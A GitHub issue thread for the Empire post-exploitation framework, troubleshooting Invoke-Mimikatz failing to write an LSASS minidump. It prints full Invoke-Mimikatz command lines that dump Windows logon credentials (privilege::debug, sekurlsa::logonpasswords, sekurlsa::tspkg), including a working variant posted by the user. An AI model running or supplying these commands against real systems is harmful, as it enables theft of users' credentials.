### ISSUE TITLE
invoke-mimikatz.ps1 minidump is not creating .dmp file. error 0x2 file not found.

### ISSUE THREAD

**Issue by merrychrishna** [BC-SECURITY/Empire#53]
## Empire Version
empire 3.0

## OS Information (Linux flavor, Python version)
Windows 10 64 bit Powershell

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
invoke-mimikatz.ps1 sekurlsa::minidump command is not creating lsass.dmp file even when running file as administrator. I searched my entire c drive but the .dmp file is not found because the file is never created.

sekurlsa::logonpasswords and sekurlsa::tspkg return error 0x2  because lsass.dmp file is not found.

## Screenshot of error, embedded text output, or Pastebin link to the error
command:
Invoke-Mimikatz -Command '"log %TEMP%\mimikatz.log" "privilege::debug" "sekurlsa::minidump %TEMP%\lsass.dmp" "sekurlsa::logonpasswords %TEMP%\lsass.dmp" "sekurlsa::tspkg %TEMP%\lsass.dmp"'

mimikatz log:
mimikatz(powershell) # log %TEMP%\mimikatz.log
Using 'C:\Users\user4\AppData\Local\Temp\mimikatz.log' for logfile : OK

mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # sekurlsa::minidump %TEMP%\lsass.dmp
Switch to MINIDUMP : 'C:\Users\user4\AppData\Local\Temp\lsass.dmp'

mimikatz(powershell) # sekurlsa::logonpasswords %TEMP%\lsass.dmp
Opening : 'C:\Users\user4\AppData\Local\Temp\lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)

mimikatz(powershell) # sekurlsa::tspkg %TEMP%\lsass.dmp
Opening : 'C:\Users\user4\AppData\Local\Temp\lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)

**Comment by Cx01N** [comment]
This appears to be similar to a few other issues within mimikatz.
https://github.com/gentilkiwi/mimikatz/issues/226
https://github.com/gentilkiwi/mimikatz/issues/248
https://github.com/gentilkiwi/mimikatz/issues/208

We will be sure to keep our tool updated with the latest tool.

**Comment by merrychrishna** [comment]
> This appears to be similar to a few other issues within mimikatz.
> [gentilkiwi/mimikatz#226](https://github.com/gentilkiwi/mimikatz/issues/226)
> [gentilkiwi/mimikatz#248](https://github.com/gentilkiwi/mimikatz/issues/248)
> [gentilkiwi/mimikatz#208](https://github.com/gentilkiwi/mimikatz/issues/208)
> 
> We will be sure to keep our tool updated with the latest tool.

I managed to get it working with this command
Invoke-Mimikatz -Command '"log %TEMP%\mimikatz.log" "privilege::debug exit" "sekurlsa::logonpasswords" "sekurlsa::tspkg"'

So it just doesn't work when you specify the file and path for mimikatz to output the dmp file to.

**Comment by Cx01N** [comment]
@merrychrishna glad to hear you found a fix. Let us know if you find something we can do on our end.

**Comment by Cx01N** [comment]
Closing due to not being directly an Empire issue.
